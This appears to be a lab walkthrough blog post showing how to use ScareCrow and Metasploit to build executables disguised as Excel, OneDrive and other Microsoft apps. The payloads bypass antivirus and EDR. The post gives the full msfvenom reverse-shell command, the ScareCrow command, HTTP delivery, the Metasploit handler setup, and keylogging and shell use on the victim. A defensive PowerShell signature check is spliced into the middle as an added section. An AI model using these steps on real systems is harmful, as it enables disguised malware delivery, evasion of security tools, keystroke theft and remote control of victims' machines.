Creating Payloads with ScareCrow to Mimic Reputable Sources and Bypass Anti-Virus

Cybertech Maven, published in InfoSec Write-ups, Apr 13, 2024

This write-up discusses using ScareCrow to create payload frameworks for side loading (not injecting) into a legitimate Windows process, bypassing Application Whitelisting controls.

After the DLL loader is loaded into memory, a technique is employed to flush the Endpoint Detection & Response (EDR) hooks out of the system DLLs mapped in the process’s memory. The technique works because EDR hooks are placed at the moment a process is launched, so they can be undone afterwards.

ScareCrow can target and manipulate DLLs in memory using the API function VirtualProtect. This function changes the permissions of a process’s memory section from Execute-Read to Read-Write-Execute.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

  • VirtualBox
  • ReviOS — Windows 11 VM (Victim)
  • Parrot OS VM (Attacker)

ScareCrow Installation

Setup Payloads

First, we use msfvenom to generate a Meterpreter reverse TCP shell.

sudo msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.0.200.30 LPORT=443 -f raw -o av-bypass.bin

Copy the av-bypass.bin file to the ScareCrow directory.

Type the following command to start ScareCrow and generate a payload.

./ScareCrow -I av-bypass.bin -domain <enter_domain_here> -encryptionmode AES

A OneDrive.exe payload is generated.

Each time we execute the ./ScareCrow command, we get a different binary name. For example, if we rerun the command, we get an Outlook.exe payload.

We also created a OneNote.exe and an Excel.exe payload.

The generated payloads are in the ScareCrow directory.

Make a new payloads directory within the ScareCrow directory and copy the payloads into it.

From inside the payloads directory, start an HTTP server on port 80 using Python3 so that the payload files are served over HTTP.

sudo python3 -m http.server 80

This msfconsole command launches the Metasploit console in quiet mode, suppressing banner and startup messages for a streamlined experience.

sudo msfconsole -q

This sequence of commands is used within the Metasploit Framework (msfconsole) to set up a handler to receive a reverse TCP shell connection.

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 10.0.200.30
set LPORT 443
run

It specifies the payload type (windows/x64/meterpreter_reverse_tcp), sets the listener's host IP address (LHOST) to 10.0.200.30, and the listener's port (LPORT) to 443. Finally, the run command initiates the handler, waiting for a connection from a target machine.

Executing the Payloads

In a real-world scenario, an attacker would probably send the payload via email or other methods, but for the demonstration purposes of this lab, we will open the Brave browser on the victim machine and navigate to 10.0.200.30.

The web server we created using Python3 lists all of our payloads.

We will download and save the Excel.exe and OneDrive.exe files onto the victim’s machine.

We can also see the corresponding requests in the log of the web server we created.

After saving the files, we can check the victim’s Downloads folder and find the Excel and OneDrive files carrying the genuine application icons. Looking like the real application is the whole point of using ScareCrow.

Right-click on the Excel file → Click Properties → Click Details.

Here, the Details tab also lists Microsoft as the apparent signer of Excel.exe. It looks completely real, and Windows Defender won’t pick it up.

When we double-click the Excel file, nothing that resembles Excel opens, but the payload runs and a meterpreter session is opened.
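A defender-side check, added here and not part of the original write-up: the Details tab only displays publisher metadata, whereas Authenticode validation checks whether the signing certificate chains to a trusted root. This PowerShell snippet reports executables whose company name or signer subject names Microsoft while the signature status is anything other than Valid; the scanned folder and the "Microsoft" match string are assumptions.

```powershell
# Added example (not from the original write-up). Lists executables whose
# metadata claims a Microsoft origin but whose Authenticode signature does
# not validate. The folder path is an assumption; adjust it for the host.
param(
    [string]$Folder = "$env:USERPROFILE\Downloads"
)

function Get-SuspiciousSigner {
    param([string]$Path)

    Get-ChildItem -Path $Path -Include *.exe, *.dll -Recurse -File | ForEach-Object {
        $sig  = Get-AuthenticodeSignature -FilePath $_.FullName
        $info = $_.VersionInfo
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }

        # Suspicious when the file presents itself as Microsoft's but the
        # signature does not chain to a trusted root (Status is not Valid).
        $claimsMicrosoft = ($info.CompanyName -like '*Microsoft*') -or ($subject -like '*Microsoft*')
        if ($claimsMicrosoft -and $sig.Status -ne 'Valid') {
            [pscustomobject]@{
                File        = $_.FullName
                CompanyName = $info.CompanyName
                Signer      = $subject
                Status      = $sig.Status   # e.g. NotSigned, UnknownError, HashMismatch
            }
        }
    }
}

Get-SuspiciousSigner -Path $Folder | Format-Table -AutoSize
```

A file that is genuinely signed by Microsoft returns Status Valid and is not listed; anything reported here deserves a closer look regardless of its icon or version information.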

When we type the command help, we can see all the commands we can run.

To test that the session is functional, we can start a keyscan (keystroke capture).

Type the following command in the meterpreter session:

keyscan_start

On the victim machine, we opened Notepad and typed, “My password is password123.”

Typing keyscan_dump shows us what was typed on the victim machine.

keyscan_dump

Back in Notepad, we added, “it captured capitalized letters as well.”

So, every time we type keyscan_dump in meterpreter, it shows us the newly typed text.

To stop the scan, we can type:

keyscan_stop

Now, what we type is no longer captured.

By typing shell, we drop into a Windows command shell on the victim. From there we can open the victim’s browser and direct it to a particular website using the following command:

explorer "https://google.com"

The following TASKKILL command will kill the Brave processes.

TASKKILL /F /IM brave.exe

Conclusion

Thank you for reading this article. I hope that you have found the information provided valuable and helpful.

Follow me for more articles.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!


Cybersecurity Researcher | Ethical Hacker | Security Analyst | Web App Pentester | Threat Intelligence